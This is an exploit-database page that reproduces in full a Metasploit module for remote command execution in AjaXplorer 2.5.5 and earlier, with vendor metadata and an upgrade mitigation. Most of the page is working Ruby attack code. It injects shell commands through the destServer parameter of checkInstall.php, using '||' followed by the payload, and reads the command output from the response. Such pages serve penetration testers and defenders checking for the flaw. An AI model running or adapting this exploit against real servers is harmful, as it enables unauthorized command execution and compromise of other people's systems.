header-logo
Suggest Exploit
vendor:
AjaXplorer
by:
Julien Cayssol, David Maciejak, sinn3r
N/A
CVSS
N/A
Remote Command Execution
N/A
CWE
Product Name: AjaXplorer
Affected Version From: 2.5.5
Affected Version To: 2.6
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix, BSD, Linux, OSX, Windows
2010

AjaXplorer checkInstall.php Remote Command Execution

This module exploits an arbitrary command execution vulnerability in the AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6 are vulnerable.

Mitigation:

Upgrade to AjaXplorer 2.6 or later
Source

Exploit-DB raw data:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AjaXplorer checkInstall.php Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
				AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to
				2.6 are vulnerable.
			},
			'Author'         =>
				[
					'Julien Cayssol',  #Credited according to SecurityFocus
					'David Maciejak',  #Metasploit module
					'sinn3r'           #Final touch on the Metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'OSVDB', '63552' ],
					[ 'BID', '39334' ]
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'ConnectionType' => 'find',
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby python bash telnet'
						}
				},
			'Platform'       => ['unix', 'bsd', 'linux', 'osx', 'windows'],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'AjaXplorer 2.5.5 or older', { }]],
			'DisclosureDate' => 'Apr 4 2010',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/'])
			], self.class)
	end

	def check
		target_uri.path << '/' if target_uri.path[-1,1] != '/'
		clue = Rex::Text::rand_text_alpha(rand(5) + 5)

		res = send_request_cgi({
			'method' => 'GET',
			'uri'      => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
			'vars_get' => {
				'destServer'    => "||echo #{clue}"
			}
		})

		# If the server doesn't return the default redirection, probably something is wrong
		if res and res.code == 200 and res.body =~ /#{clue}/
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		peer = "#{rhost}:#{rport}"
		target_uri.path << '/' if target_uri.path[-1,1] != '/'

		# Trigger the command execution bug
		res = send_request_cgi({
			'method' => 'GET',
			'uri'      => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
			'vars_get' =>
				{
					'destServer'    => "||#{payload.encoded}"
				}
			})

		if res
			print_status("#{peer} - The server returned: #{res.code} #{res.message}")
			m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || ''

			if m.empty?
				print_error("#{peer} - This server may not be vulnerable")
			else
				print_status("#{peer} - Command output from the server:")
				print_line(m)
			end
		end
	end

end

=begin
Repo:
http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/
=end

Navigation

Suggest Exploit

Services By CQR